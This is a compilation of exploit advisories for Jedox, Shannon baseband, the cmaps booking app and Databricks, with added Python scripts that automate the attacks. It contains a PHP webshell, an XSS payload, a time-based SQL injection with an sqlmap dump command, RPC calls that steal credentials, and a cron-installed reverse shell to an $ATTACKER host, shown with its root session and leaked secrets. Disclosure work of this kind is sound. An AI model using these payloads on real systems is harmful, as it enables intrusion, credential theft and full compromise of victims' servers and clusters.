<pre><code># Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47874<br /><br /><br />Introduction<br />=================<br />Improper access controls in `/tc/rpc` allow remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "conn",<br /> "ls",<br /> [<br /> null,<br /> false,<br /> true,<br /> [<br /> "type",<br /> "active",<br /> "description"<br /> ]<br /> ]<br /> ]<br /> ]<br /><br />2) Retrieve details of a database connection (specify the connection name via CONNECTION), including encrypted credentials, using the Java RPC function `com.jedox.etl.mngr.Connections::getGlobalConnection`:<br /><br /> PATH: /tc/rpc<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "com.jedox.etl.mngr.Connections",<br /> "getGlobalConnection",<br /> [<br /> "<CONNECTION>"<br /> ]<br /> ]<br /> ]<br /><br /></code></pre>
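The two requests above can be scripted, for example in Python. This is a minimal sketch: the base URL and the session cookie are placeholders for a real installation and an authenticated session, and it assumes the endpoints accept the JSON bodies as-is.

```python
import json
import urllib.request

# Assumptions (not from the advisory): target base URL and the cookie of an
# authenticated user.
BASE = "https://jedox.example.com"
COOKIE = "JSESSIONID=<SESSION>"

def rpc_body_list_connections():
    """JSON body from step 1 (conn::ls, see also CVE-2022-47879)."""
    return [["conn", "ls", [None, False, True, ["type", "active", "description"]]]]

def rpc_body_connection_details(connection):
    """JSON body from step 2 for a connection name learned in step 1."""
    return [["com.jedox.etl.mngr.Connections", "getGlobalConnection", [connection]]]

def post(path, body):
    """POST an RPC body to the target (network side effect)."""
    req = urllib.request.Request(
        BASE + path,
        data=json.dumps(body).encode(),
        headers={"Cookie": COOKIE, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()

# Usage against a vulnerable instance:
#   names = post("/be/rpc.php", rpc_body_list_connections())
#   details = post("/tc/rpc", rpc_body_connection_details("<CONNECTION>"))
```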
<pre><code># Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts<br /># Date: 28/04/2023<br /># Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47876<br /><br /><br />Introduction<br />=================<br />Jedox Integrator allows remote authenticated users to create jobs that execute arbitrary code via Groovy scripts. To exploit the vulnerability, the attacker must be able to create a Groovy job in the Integrator.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following Groovy script to execute `whoami`. The output of the command can be viewed in the logs:<br /><br /> def sout = new StringBuilder(), serr = new StringBuilder()<br /> def proc = 'whoami'.execute()<br /> proc.consumeProcessOutput(sout, serr)<br /> proc.waitForOrKill(10000)<br /> LOG.error(sout.toString());<br /> LOG.error(serr.toString());<br /><br /></code></pre>
<pre><code># Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47878<br /><br /><br />Introduction<br />=================<br />Incorrect input validation for the default storage path variable in the settings page allows remote authenticated users to specify the web root directory as the storage location. Subsequent file uploads can then lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) In the application settings page of the UI, the default storage path can be set to any value, including the web root directory of the web server, e.g. /htdocs/app/docroot/.<br /><br />2) Any upload/import function can then be used to upload a .php webshell file to the web root.<br /><br />3) Execute the webshell from the web root directory to obtain RCE.<br /><br /></code></pre>
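The steps above can be illustrated with a short sketch. The webshell contents, the file name (`shell.php`), the query parameter (`cmd`) and the base URL are assumptions for illustration, not taken from the advisory:

```python
import urllib.parse
import urllib.request

# Hypothetical minimal PHP webshell to upload in step 2.
WEBSHELL = "<?php system($_GET['cmd']); ?>"

def run_command(base_url, cmd):
    """Step 3: call the uploaded webshell inside the web root."""
    query = urllib.parse.urlencode({"cmd": cmd})
    with urllib.request.urlopen(f"{base_url}/shell.php?{query}") as resp:
        return resp.read().decode()

# Usage against a vulnerable instance:
#   output = run_command("https://jedox.example.com", "id")
```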
<pre><code># Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47877<br /><br /><br />Introduction<br />=================<br />A stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML into the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) Store a log entry with an XSS payload:<br /><br /> PATH: /ub/ccmd<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "log",<br /> "error",<br /> "<img src=# onerror=\"alert('XSS')\">"<br /> ]<br /> ]<br /><br />2) Trigger the XSS payload by opening the Logs page and displaying the respective log entry.<br /> <br /></code></pre>
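Step 1 can be scripted as follows. The base URL and session cookie are placeholders for a real instance and an authenticated session; the payload is the one from the PoC:

```python
import json
import urllib.request

BASE = "https://jedox.example.com"  # assumption: target base URL
PAYLOAD = "<img src=# onerror=\"alert('XSS')\">"

def log_body():
    """JSON body that stores the payload as an error log entry."""
    return [["log", "error", PAYLOAD]]

def store_payload(cookie="JSESSIONID=<SESSION>"):
    """POST the payload to /ub/ccmd (network side effect)."""
    req = urllib.request.Request(
        BASE + "/ub/ccmd",
        data=json.dumps(log_body()).encode(),
        headers={"Cookie": cookie, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status
```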
<pre><code># Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2022.4 (22.4.2) and older<br /># CVE : CVE-2022-47875<br /><br /><br />Introduction<br />=================<br />A directory traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have permission to upload files.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`).<br /><br />2) Upload a PHP file and note the file system path (`fspath`).<br /><br />3) Get RCE via directory traversal:<br /><br /> PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php<br /> METHOD: POST<br /><br /></code></pre>
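Step 3 can be sketched as below. The `fspath` and the number of `../` segments depend on the upload response from step 2; the base URL is a placeholder:

```python
import urllib.request

BASE = "https://jedox.example.com"  # assumption: target base URL

def traversal_url(fspath, depth=5):
    """Prefix the fspath noted in step 2 with enough '../' segments."""
    return BASE + "/be/erpc.php?c=" + "../" * depth + fspath.lstrip("/")

def trigger(fspath, depth=5):
    """Step 3: POST to the traversal URL to execute the uploaded PHP file."""
    req = urllib.request.Request(traversal_url(fspath, depth), method="POST")
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()
```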
<pre><code># Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2022.4 (22.4.2) and older<br /># CVE : CVE-2022-47879<br /><br /><br />Introduction<br />=================<br />A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute their methods. To exploit this vulnerability, the attacker needs knowledge of loadable classes, their methods, and their arguments.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "Studio",<br /> "getUserCreds"<br /> ]<br /> ]<br /><br />2) Using the function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker-controlled server (specify HOST and PORT) with the authenticated user's credentials. 
This could leak cleartext credentials to an attacker.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "conn",<br /> "test_palo",<br /> [<br /> "<HOST>",<br /> "<PORT>",<br /> "",<br /> "",<br /> true,<br /> null<br /> ]<br /> ]<br /> ]<br /><br />3) The function `Studio::getExternURI` can be used to generate a URL with the embedded username and encrypted password of the currently authenticated user.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "Studio",<br /> "getExternURI",<br /> [<br /> 0,<br /> "",<br /> [<br /> 0<br /> ],<br /> {<br /> "flag":1<br /> }<br /> ]<br /> ]<br /> ]<br /><br />4) List all available database connections via `conn::ls`:<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "conn",<br /> "ls",<br /> [<br /> null,<br /> false,<br /> true,<br /> [<br /> "type",<br /> "active",<br /> "description"<br /> ]<br /> ]<br /> ]<br /> ]<br /><br />5) Retrieve details of an individual database connection (specify the connection name via CONNECTION), including encrypted credentials, using the Java RPC function `com.jedox.etl.mngr.Connections::getGlobalConnection`:<br /><br /> PATH: /tc/rpc<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "com.jedox.etl.mngr.Connections",<br /> "getGlobalConnection",<br /> [<br /> "<CONNECTION>"<br /> ]<br /> ]<br /> ]<br /><br />6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify the encrypted credentials via ENCRYPTEDCREDS):<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "common",<br /> "decrypt",<br /> [<br /> "<ENCRYPTEDCREDS>"<br /> ]<br /> ]<br /> ]<br /><br />7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify the config param via CONFIG). 
For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password):<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "common",<br /> "paloGet",<br /> [<br /> null,<br /> "Config",<br /> "#_config",<br /> [<br /> "config"<br /> ],<br /> {<br /> "config": [<br /> "<CONFIG>"<br /> ]<br /> },<br /> true,<br /> true<br /> ]<br /> ]<br /> ]<br /><br />8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "palo_mgmt",<br /> "sess_list",<br /> [<br /> null<br /> ]<br /> ]<br /> ]<br /><br />9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system:<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "palo_mgmt",<br /> "lic_users_list",<br /> [<br /> "0"<br /> ]<br /> ]<br /> ]<br /><br /></code></pre>
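All of the `/be/rpc.php` calls above share the same `[class, method, args]` shape, so they can be driven by one small helper. This is a sketch: the base URL and the session cookie are placeholders for a real instance and an authenticated session.

```python
import json
import urllib.request

BASE = "https://jedox.example.com"  # assumption: target base URL
COOKIE = "JSESSIONID=<SESSION>"     # assumption: authenticated session cookie

def build_call(cls, method, args=None):
    """Build one RPC call; the args element is omitted when not needed."""
    return [cls, method] if args is None else [cls, method, args]

def rpc(cls, method, args=None):
    """POST a single call to /be/rpc.php and decode the JSON response."""
    req = urllib.request.Request(
        BASE + "/be/rpc.php",
        data=json.dumps([build_call(cls, method, args)]).encode(),
        headers={"Cookie": COOKIE, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read().decode())

# Usage against a vulnerable instance, mirroring steps 1, 6 and 8:
#   creds = rpc("Studio", "getUserCreds")
#   plain = rpc("common", "decrypt", ["<ENCRYPTEDCREDS>"])
#   sessions = rpc("palo_mgmt", "sess_list", [None])
```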
<pre><code>Shannon Baseband: Memory corruption when processing fmtp SDP attribute<br /><br />There is a memory corruption vulnerability that occurs when the baseband modem processes SDP when setting up a call. When an fmtp attribute is parsed, the integer that represents the payload type is copied into an 8-byte buffer using memcpy, with the length of the payload type as the length parameter. There are no checks that the payload type is less than 8 bytes long or that it is actually an integer.<br /><br />I was not able to reproduce this bug, as most carrier SIP servers filter SDP that contains this error; however, there is still a risk that some servers won't filter this SDP, or that a server gets compromised.<br /><br />A sample line of SDP that causes the problem is as follows:<br /><br /><br />a=fmtp:1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA00 0-15<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2023-03-19.<br /><br /><br />Related CVE Numbers: CVE-2022-26496.<br /><br /><br /><br />Found by: natashenka@google.com<br /><br /></code></pre>
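The flawed pattern can be modeled with a short sketch (purely illustrative Python, not the actual baseband code): the payload-type field is copied into a fixed 8-byte buffer using the field's own length, so the two checks below are exactly what the vulnerable parser omits.

```python
def parse_payload_type(sdp_line: str) -> bytes:
    """Illustrative model of parsing 'a=fmtp:<payload type> <params>'.

    The payload-type field runs from the ':' up to the first space. The
    vulnerable code does the equivalent of memcpy(buf, field, len(field));
    the two validations below are the ones it is missing.
    """
    field = sdp_line.split(":", 1)[1].split(" ", 1)[0].encode()
    buf = bytearray(8)  # fixed 8-byte destination buffer
    if len(field) > len(buf):       # missing check #1: field length
        raise ValueError("payload type longer than 8 bytes")
    if not field.isdigit():         # missing check #2: field is an integer
        raise ValueError("payload type is not an integer")
    buf[: len(field)] = field
    return bytes(buf)

# A benign line parses; the advisory's sample line fails the length check.
```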
<pre><code># Exploit Title: Unauthenticated SQL injection<br />- Google Dork:<br />- Date: 27.04.2023<br />- Exploit Author: Lucas Noki (0xPrototype)<br />- Vendor Homepage: https://github.com/vogtmh<br />- Software Link: https://github.com/vogtmh/cmaps<br />- Version: 8.0<br />- Tested on: Mac, Windows, Linux<br />- CVE : CVE-2023-29809<br /><br />*Description:*<br /><br />The vulnerability is an SQL injection in the `bookmap` parameter. When visiting the page http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However, if a single quote is appended to the value of the `bookmap` parameter, we get an error message:<br />```html<br /><b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br /><br />```<br /><br />If two single quotes are appended instead, we get the normal response without an error. This indicates an SQL injection. To prove it, we append the following payload: <br />```<br />'-(select*from(select+sleep(2)+from+dual)a)--+<br />```<br /><br />The page will sleep for two seconds, confirming the SQL injection.<br /><br />*Steps to reproduce:*<br /><br />1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```<br /><br />2. 
If the site slept for two seconds, run the following sqlmap command to dump the whole database, including the LDAP credentials:<br /> ```shell<br /> python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump<br /> ```<br /><br />Special thanks go out to iCaotix, who greatly helped me with setting up the environment and debugging my payload.<br /><br /><br /><br />## Request to the server:<br /><br /><img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" /><br /><br />## Response from the server:<br /><br />Look at the response time.<br /><br /><img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" /><br /></code></pre>
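The time-based check from the steps above can be scripted before reaching for sqlmap. The host is a placeholder, and the payload is the advisory's sleep payload in decoded form (spaces are re-encoded as `+` by `urlencode`):

```python
import time
import urllib.parse
import urllib.request

BASE = "http://<IP>/rest/booking/index.php"  # placeholder host
PAYLOAD = "test'-(select*from(select sleep(2) from dual)a)-- "

def build_url(bookmap_value):
    """URL for the vulnerable endpoint with an encoded bookmap parameter."""
    query = urllib.parse.urlencode({"mode": "list", "bookmap": bookmap_value})
    return f"{BASE}?{query}"

def looks_vulnerable(threshold=2.0):
    """True if the sleep payload delays the response by >= threshold seconds."""
    start = time.monotonic()
    urllib.request.urlopen(build_url(PAYLOAD))
    return time.monotonic() - start >= threshold
```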
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230502-0 ><br />=======================================================================<br /> title: Bypassing cluster isolation through insecure defaults and<br /> shared storage<br /> product: Databricks Platform<br /> vulnerable version: PaaS version as of 2023-01-26<br /> fixed version: Current PaaS version<br /> CVE number: -<br /> impact: critical<br /> homepage: https://www.databricks.com<br /> found: 2023-01-20<br /> by: Florian Roth (Atos)<br /> Marius Bartholdy (SEC Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult.<br /> SEC Consult is part of Eviden, an atos business<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Databricks Data Science & Engineering (sometimes called simply "Workspace")<br />is an analytics platform based on Apache Spark. It is integrated with Azure to<br />provide one-click setup, streamlined workflows, and an interactive workspace<br />that enables collaboration between data engineers, data scientists, and<br />machine learning engineers."<br /><br />Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor disabled legacy scripts and migrated cluster-scoped scripts from<br />DBFS to WSFS. Affected customers received migration instructions.<br /><br />SEC Consult highly recommends performing a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br />We have also written a blog post in collaboration with Elia Florio, Sr. 
Director<br />of Detection & Response at Databricks and Florian Roth and Marius Bartholdy,<br />security researchers with SEC Consult. It can be found here:<br />https://r.sec-consult.com/databr<br /><br />Furthermore, a proof of concept demo video has been published here (Youtube):<br />https://r.sec-consult.com/dbyoutube<br /><br /><br />Databricks concepts:<br />--------------------<br />Concept 1: Databricks File System (DBFS):<br /><br />"The Databricks File System (DBFS) is a distributed file system mounted into a<br /> Databricks workspace and available on Databricks clusters. DBFS is an<br />abstraction on top of scalable object storage that maps Unix-like filesystem<br />calls to native cloud storage API calls."<br /><br />Source: https://docs.databricks.com/dbfs/index.html<br /><br />Therefore developers can easily handle files as if they were local to a compute<br />cluster although they actually reside in a cloud storage.<br /><br />The recommended way to interact with the DBFS is from within a notebook by using<br />the Databricks Utilities (dbutils). The following command could be used to list<br />the content of a directory:<br />===============================================================================<br />display(dbutils.fs.ls("dbfs:/databricks/scripts"))<br />===============================================================================<br /><br />For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/<br /><br /><br />Concept 2: Init Scripts:<br /><br />Databricks uses a feature called "init script" to customize compute clusters.<br />They can be used to install dependencies or to configure advanced network<br />settings. These are shell scripts that run during the startup of each cluster.<br /><br />There are different types of init scripts:<br /><br />(I) Cluster-scoped init scripts only run on the specified cluster and have to be<br />setup by the cluster owner. 
Before using a cluster-scoped script it has to be<br />uploaded to the DBFS. In the cluster configuration it is then referenced by its<br />file path, e.g. dbfs:/databricks/scripts/init-health-check.sh<br /><br />(II) Global init scripts run on every cluster and have to be configured by an<br />administrative user. Their storage location is not disclosed.<br /><br />(III) Legacy global init scripts are theoretically deprecated. However, they are<br />enabled by default, even on newly created workspaces. The main difference from<br />the newer global init scripts is that they are stored on the DBFS in a fixed<br />location at dbfs:/databricks/init.<br /><br />For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Bypassing cluster isolation through insecure defaults and shared storage<br /><br />A low-privilege user is able to break the isolation between Databricks compute<br />clusters and take over any cluster in a workspace as long as they are allowed<br />to run notebooks. Due to an insecure default configuration combined with<br />insufficient access control, it is possible to gain remote code execution on all<br />clusters of a workspace. With such access, it is possible to leak secrets and<br />to escalate privileges to those of a workspace administrator.<br /><br /><br />Attack scenario:<br />The DBFS is accessible by every user in a Databricks workspace. All files stored<br />here are visible to anyone in the workspace. Cluster-scoped and legacy global<br />init scripts are stored here.<br /><br />An authenticated attacker with the lowest possible permissions in a Databricks<br />workspace could run a notebook to:<br /><br />1. Find and modify an existing cluster-scoped init script.<br />2. 
Place a new script in the default location for legacy global init scripts.<br /><br />Both attacks lead to the takeover of the compute cluster resources and enable<br />further attacks. Firstly, any stored secrets can be read and, secondly,<br />workspace administrator tokens can be stolen as demonstrated by Joosua<br />Santasalo from Secureworks.<br /><br />See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html<br /><br /><br />Proof of concept:<br />-----------------<br />1) Bypassing cluster isolation through insecure defaults and shared storage<br />a) Preparations:<br /><br />For this POC a new Azure Databricks workspace was created with the "premium"<br />pricing tier. It includes an administrative user (databricks-workspace-admin)<br />as well as a newly added low-privileged user (databricks-user) with the default<br />permissions "Workspace access" and "Databricks SQL access". These are the fewest<br />possible permissions a user can have.<br /><br />To demonstrate both attack scenarios, three clusters were created:<br /><br />1. Cluster on which the databricks-user has permissions to run notebooks<br /> ("Can attach to")<br />2. Cluster for the databricks-workspace-admin with a cluster-scoped init script<br /> already configured.<br />3. 
Cluster for the databricks-workspace-admin with NO init script<br /><br />The databricks-user does not have access to clusters 2 and 3.<br />They cannot even see them in the portal.<br /><br />For cluster 2 (with a pre-configured init script) the following notebook<br />code was used by the databricks-workspace-admin to create an init script which<br />simply writes example output to /tmp/init-health-check-success.txt:<br /><br />===============================================================================<br />dbutils.fs.mkdirs("dbfs:/databricks/scripts/")<br />dbutils.fs.put("/databricks/scripts/init-health-check.sh","""<br />#!/bin/bash<br />echo 'Init health check: successful' > /tmp/init-health-check-success.txt""", True)<br />display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))<br />===============================================================================<br /><br />After that the script was applied to cluster 2 as a cluster-scoped init script.<br /><br />To show the impact of this attack in a more tangible way, a keyvault-backed<br />secret scope as well as a databricks-backed secret scope were also created.<br />Their secrets were then used in the spark configuration and in the environment<br />variables of clusters 2 and 3.<br /><br />===============================================================================<br />Spark configuration:<br />databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}<br />azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}}<br /><br />Environment variables:<br />databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}<br />azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}<br />===============================================================================<br /><br
/>These serve only as examples. On a real production compute cluster they could be used to<br />connect to additional cloud storage as described here:<br />https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal<br /><br /><br />b) Attack via pre-existing init script:<br /><br />The attacker starts by viewing the content of the DBFS with the following code:<br />===============================================================================<br />display(dbutils.fs.ls("dbfs:/databricks"))<br />display(dbutils.fs.ls("dbfs:/databricks/scripts"))<br />===============================================================================<br /><br />All found .sh files could potentially be cluster-scoped init scripts applied to<br />clusters that the attacker is not aware of. It is not possible to overwrite<br />existing scripts; they can, however, be renamed or deleted. The cluster<br />configuration is only aware of the script names. Therefore, a newly created<br />script with the same name will be executed. 
Such a malicious file was created.<br />It includes a reverse shell that will continually attempt to connect to the<br />attacker's server.<br /><br />===============================================================================<br /> # rename file<br />dbutils.fs.mv("/databricks/scripts/init-health-check.sh",<br />"/databricks/scripts/init-health-check.sh.old")<br />#write new file with malicious content<br />dbutils.fs.put("/databricks/scripts/init-health-check.sh","""<br />#!/bin/bash<br />crontab -l > mycron<br />echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron<br />crontab mycron<br />rm mycron<br />""", True)<br />===============================================================================<br /><br />As soon as the init script is triggered again, for example via a cluster restart,<br />a reverse shell connection, with root privileges on the compute cluster, is<br />received:<br /><br />===============================================================================<br />user@$ATTACKER:~$ nc -lnkvp 8091<br />Listening on [0.0.0.0] (family 0, port 8091)<br />Connection from $TARGET 48518 received!<br />bash: cannot set terminal process group (21384): Inappropriate ioctl for device<br />bash: no job control in this shell<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# id<br />id<br />uid=0(root) gid=0(root) groups=0(root)<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a<br />uname -a<br />Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux<br />root@0121-110521-h6l5h1n2-10-139-64-5:~#<br />===============================================================================<br /><br /><br />c) Attack via legacy global init script:<br /><br />The legacy global init script is enabled by default, therefore an attacker could<br />assume it is turned on and place a script in the default location at<br />dbfs:/databricks/init.<br /><br 
/>===============================================================================<br />dbutils.fs.mkdirs("dbfs:/databricks/init/")<br />dbutils.fs.put("dbfs:/databricks/init/global-init.sh", """<br />#!/bin/bash<br />crontab -l > mycron<br />echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron<br />crontab mycron<br />rm mycron<br />""", True)<br />===============================================================================<br /><br />Global init scripts apply to every existing compute cluster. Every cluster will<br />now establish a reverse shell as soon as the script is triggered again. With<br />this attack it is possible to compromise compute clusters even if they do not have<br />a cluster-scoped init script set up.<br /><br />===============================================================================<br />user@$ATTACKER:~$ nc -lnkvp 8091<br />Listening on [0.0.0.0] (family 0, port 8091)<br />Connection from $TARGET 53910 received!<br />bash: cannot set terminal process group (988): Inappropriate ioctl for device<br />bash: no job control in this shell<br />root@0121-111747-cmijb28n-10-139-64-4:~# id<br />id<br />uid=0(root) gid=0(root) groups=0(root)<br />root@0121-111747-cmijb28n-10-139-64-4:~# uname -a<br />uname -a<br />Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux<br />root@0121-111747-cmijb28n-10-139-64-4:~#<br />===============================================================================<br /><br /><br />Impact:<br /><br />a) Leaking sensitive information in environment variables and the configuration:<br /><br />Secrets configured in the keyvault-backed secret scope can only be retrieved at<br />runtime by the compute instance itself via a managed identity. Even Databricks<br />workspace administrators cannot read them directly. They are, however, available<br />to the compute cluster as soon as it is initialized. 
With remote code execution<br />and root privileges an attacker is able to read the plain text secrets of any<br />cluster.<br /><br />Spark configuration secrets can be found at /tmp/custom-spark.conf:<br /><br />===============================================================================<br />root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf<br />cat custom-spark.conf<br />spark.databricks.unityCatalog.enforce.permissions false<br />spark.driver.host 10.139.64.6<br />spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==<br />spark.driver.tempDirectory /local_disk0/tmp<br />spark.databricks.delta.preview.enabled true<br />spark.databricks.wsfsPublicPreview true<br />databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET<br />spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==<br />spark.databricks.mlflow.autologging.enabled true<br />spark.executor.tempDirectory /local_disk0/tmp<br />spark.databricks.enablePublicDbfsFuse false<br />spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net<br />spark.master local[*, 4]<br />azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET<br 